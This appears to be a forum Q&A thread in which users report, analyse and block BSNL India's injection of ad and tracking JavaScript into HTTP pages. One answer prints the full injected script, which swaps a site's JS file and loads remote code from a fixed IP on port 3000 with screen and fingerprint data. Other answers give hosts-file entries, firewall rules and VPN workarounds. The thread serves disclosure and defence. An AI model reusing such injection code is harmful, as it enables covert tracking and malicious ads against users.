My ISP (BSNL India) is injecting ads using Phozeca which spoils websites and makes them unresponsive, can anything be done?

Question

I've been recently having a problem where my ISP (BSNL India) has been injecting ads/weird Javascript Tracking codes onto my browser, making the website unusable and unresponsive.

I've written an article regarding this too: https://www.nonstoptrend.com/bsnl-is-injecting-adsscripts-onto-your-browser-using-phozeca-2017/

You can read that to understand what exactly is happening. You can refer to the article above to see what the injected code is doing.

I'm sure this is my ISP because the domain starts with "bsnl.phozeca.com" and uses the port "3000".

Points to note:-

• Script injection works only on Non HTTPS sites, such as Steam Store and other Non HTTPS websites.
• The code being injected, uses the port 3000.
• Websites which malfunction normally work when CSP (Content Security Policy) is disabled in the browser.
• Websites which malfunction work properly on Tor Browser.
• I personally have investigated into this matter, and after reading through the code (Read my article to know what i'm talking about), and after reading the code, I called the "loadnewads()" function from the code, and once it's called, weird ads come up, such as fake Flash player ads and fake download buttons.

-Things I have tried to solve this problem.-

1. Checking hosts file and blocking the domain: Not working. The script is still being injected.
2. Scanning the PC for malware: Not working. I've scanned with over three antiviruses including Malwarebytes, still it doesn't detect anything.
3. Disabling CSP (Content Security Policy): Worked! However ads automatically start playing.
4. Changed DNS to Google's DNS: Not working.

Is there any way to solve this problem? Please help.
Thanks!

Answer 1

I had similar issues. I have a simple trick but it is temporary, but it is working for me and stopped BSNL ISP from tracking and pushing malware AD popup. I added a host entry in my computer for bsnl.phozeca.com and pointed it to localhost.

Answer 2

It looks like the malware has evolved.

It now uses an IP and is injecting itself into js files of 'http' websites (used a proxy for analyzing).

For example in case of bbc.co.uk, when browser requested for the below url :

http://static.bbc.co.uk/id/0.37.24/modules/idcta/statusbar.js

instead of the below script (original) :

define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});

the malware (isp-end?) injected the below js malacious script :

!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()

The fix that worked was to add a rule in the firewall so as to block port 3000 across bsnl's range : 117.192.0.0 117.255.255.255 (based on ultra-dns's information).

Did this both at system level as well as at the asdl-router level (since mobile devices using the network are impacted as well).

Hopefully this will minimize conflicts with other applications that use port 3000.

For Windows, video on blocking port can be found here : https://www.youtube.com/watch?v=KA8BIshUcXw

Update 17 Nov 2019 - Getting the following image () occasionally on http links upon launching browser after a period of in-activity.

Update 28 Nov 2018 : Happy (and relieved) to convey that the issue has been resolved after registering grievance on 'https://pgportal.gov.in' and subsequently BSNL BB-NOC team contacted and added user-id (corresponding to the service) to DND (may take a day or two for the change to reflect). The grievance on portal itself was about a month old at the time of them responding - although its possible they have tried to contact but had not been able to reach.

Note : Registering a standard line connectivity complaint did not work. BSNL team closed the ticket saying the internet was working (although did indicate that the advertisements were by design).

Answer 3

First try to get along with your ISP to stop doing it(if it's applicable)

As you mentioned, HTTPS cannot be compromised which should be, so try to use HTTPS where possible.

About your next attempts

1) Checking hosts file and blocking the domain: Not working. The script is still being injected.

Must work, if it doesn't so you are doing it wrong. Another way is blocking the same thing with your modem or router domain/ip block(or firewall)

If your ISP is smart enough, it should host the scripts with vary domain names, so blocking all of them will be hard for you.

2) Scanning the PC for malware

Won't work of course

3) Disabling CSP (Content Security Policy)

Have no clue what is this, but since HTTP comes with zero security, this CSP could be fooled, or/and cannot say if a content is not permitted(what logic?)

4) Changed DNS to Google's DNS

Won't work of course, the issue you have is about the post dns. even if your ISP override the result by domain resolve, it's still simple to place the add in http.

100% working solutions
Use a VPN, or a sTunnel which binds to services like squid in back. This could not work if your ISP finds your connection to the target ip(either VPN or sTunnel) as its anti-ad policy.

50% working solutions
Block all of the contents by your browser adblock(or anything else) plugin.

Answer 4

As Preetam suggested - adding more details.

1. i downloaded the hosts file from http://winhelp2002.mvps.org/hosts.zip Replaced it in this location C:\Windows\System32\drivers\etc

2. If you do not know how to replace the hosts file then you can follow this instruction http://winhelp2002.mvps.org/hostswin8.htm

3. To get rid of the popup from engine.spotscenered.info/link.engine?guid= I added the following entries within the host file:

   0.0.0.0 www.onclickmax.com
   0.0.0.0 bsnl.phozeca.com
   0.0.0.0 *.onclickmax.com
   0.0.0.0 phozeca.com
   0.0.0.0 c.phozeca.com
   

I do not see any popup ads... gone!

Answer 5

I have written this earlier on India Broadband Forum as well. You need to block 3 websites via URL Filter or hosts block: mutualvehemence.com bsnl.phozeca.com:3000 (or c.phozeca.com:3000) decademical.com

WHOIS the 2nd website and you will realise that Bsnl itself is injecting these ads. Registered address of server says NS Cell, BSNL etc.. So the Head office of bsnl is responsible for this. (NS is probably network surveillance). More such websites will be released for JS Injection as 2nd website was not earlier used for injection

Simple solution: Visit any http website and right click any where on page. Then click Inspect Element and click Sources tab and look at all the sources. One of these will have an obfuscated JS file (if not blocked) which is the reason for popup ads. Block that URL.

Answer 6

The method of click-jacking works only from the BSNL BroadBand connection not from BSNL SIM data network. Even though the script loads, but doesn't move to other websites

BSNL servers have been corrupting or infecting with Malware / Virus day-by-day due to poor security

Recently http://www.memo.tv would redirect it into http://xalabazar.com changed to http://preskalyn.com

Found the script with url : Be aware, before clicking this link

Decoded URL:

http://117.254.84.212:3000/getjs?nadipdata="{"url":"/wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp","referer":"http://www.memo.tv/works/","host":"www.memo.tv","categories":[0],"reputations":[1],"nadipdomain":1}"&screenheight=1080&screenwidth=1920&tm=1558777463790&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0

Here the script is being injected to /wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp you can find the getjs() routes via method loaded from the Node.js getjs Link getting our IP Address from the BSNL SIM / any other ISP

since it would leads all your browsing information to this IP 117.254.84.212.

There was naganoadigei.com was registered explicitly to serve malware and redirect users to phishing sites.

Recently on February 2019, they had resolved the issue. But unfortunately the new type of ad based redirects found that was humparsi.com as of in the month February 2019 which was fixed on March 2019

---

Alternatively, you can block the outgoing request by your standalone system in DNS entry

Navigate to %windir%\System32\drivers\etc and edit the hosts file in elevated mode / with Admin authorization and add these lines to your hosts file

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL

To Block specific IP address you do it by blocking outgoing bounds in the firewall

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing Add-ons such as NoScript or ScriptSafe and HTTPS Everywhere

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob

Answer 7

This answer may be out of date as the script may be removed by BSNL.

The script is collecting your IP Address and subscriber ID as well: Open this link and check your Subscriber ID and IP Address as well.

Since BSNL did not comply with users' complaints on HTTP Ad Script Injection I have reported a local solution (with the help of Adguard)

Reference: Github

What this would do?

• Remove Click-jacking Ads on HTTP sites

Which devices would this work?

• All Browsers having Adguard Extension (or having uBlock Origin with Adguard Filter)
• Adguard Android
• Adguard iOS
• Adguard Mac
• Adguard Windows

What it would not do?

• It cannot stop BSNL from recording your visit to a particular HTTP website in a separate record.
• It cannot stop Redirect Scripts on FUP Expiry/Offer by Phozeca SDK (although it is currently disabled)

Update: Newer Commit: GitHub Link

Answer 8

The easiest solution might be to use the Opera browser and its built-in "VPN" service. That is not a full-blown VPN, but it will use a secure HTTPS connection to one of Opera's proxy servers. Even if Steam sends its pages insecurely to Opera, the delivery over the bsnl network will be secure.